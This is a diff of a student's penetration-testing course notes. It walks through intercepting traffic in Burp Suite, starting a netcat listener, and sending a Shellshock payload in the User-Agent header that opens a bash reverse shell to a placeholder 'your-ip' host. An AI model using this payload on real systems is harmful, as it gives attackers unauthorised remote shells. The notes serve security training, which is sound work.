gobbez/MyLearningPath/Python/CyberSecurity/INE - Penetration Tester Student course (153h)/Ch01_Assessment_Methodologies/README.md

 # Open web applications analysis -> burpsuite from your Kali Linux
 # Click on "Proxy" and "Intercept is on" from the Burpsuit GUI
 # Click on "Intercept" from the Burpsuit GUI
-nc -nvlip 1234  # On your bash set Netcat to listen on a particular port to create a reverse shell with the target
+nc -nlvp 1234  # On your bash set Netcat to listen on a particular port to create a reverse shell with the target
 # Click on "Repeater" and replace the User-Agent with () { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/your-ip/1234 0>&1'  # Create a reverse shell
 # Click on "Send"
 ```